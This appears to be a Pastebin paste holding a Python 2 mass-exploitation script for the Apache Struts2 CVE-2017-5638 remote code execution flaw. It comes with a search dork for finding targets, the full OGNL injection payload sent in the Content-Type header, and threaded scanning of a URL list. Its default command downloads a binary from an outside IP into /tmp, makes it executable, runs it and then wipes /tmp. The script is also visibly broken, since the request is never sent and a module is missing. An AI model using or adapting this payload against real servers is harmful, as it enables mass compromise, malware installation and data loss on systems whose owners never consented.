Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Modded Apache Struts2 RCE Exploit v2 CVE-2017-5638 AUTO EXPLOITER | By; LiGhT
- # Dork: "site:com filetype:action"
- # site example^: org,net,egu,gov,io,pw
- import urllib2
- import httplib
- import sys, re, os
- from threading import Thread
- strutz = open(sys.argv[1], "r").readlines()
- cmd = "cd /tmp ; wget http://1.1.1.1/kys7t ; chmod 777 kys7t ; ./kys7t ; rm -rf /tmp/*" # COMMAND HERE Arch(s): x86, i686
- def exploit(url, cmd):
- #page = ''
- payload = "%{(#_='multipart/form-data')."
- payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
- payload += "(#_memberAccess?"
- payload += "(#_memberAccess=#dm):"
- payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
- payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
- payload += "(#ognlUtil.getExcludedPackageNames().clear())."
- payload += "(#ognlUtil.getExcludedClasses().clear())."
- payload += "(#context.setMemberAccess(#dm))))."
- payload += "(#cmd='%s')." % cmd
- payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
- payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
- payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
- payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
- payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
- payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
- payload += "(#ros.flush())}"
- try:
- url = ''.join(url)
- if "http://" not in url:
- url = "http://"+url
- elif "https://" in url:
- url = url.replace("https://", "http://")
- headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
- request = urllib2.Request(url, headers=headers)
- print "\033[32mPayload Sent!"
- #page = urllib2.urlopen(request).read()
- except httplib.IncompleteRead, e:
- pass
- except KeyboardInterrupt:
- pass
- except Exception:
- pass
- #print "\n\033[35m%s"%(page)
- for url in strutz:
- try:
- l33t = Thread(target=exploit, args=(url,cmd,))
- l33t.start()
- time.sleep(0.09)
- except:
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement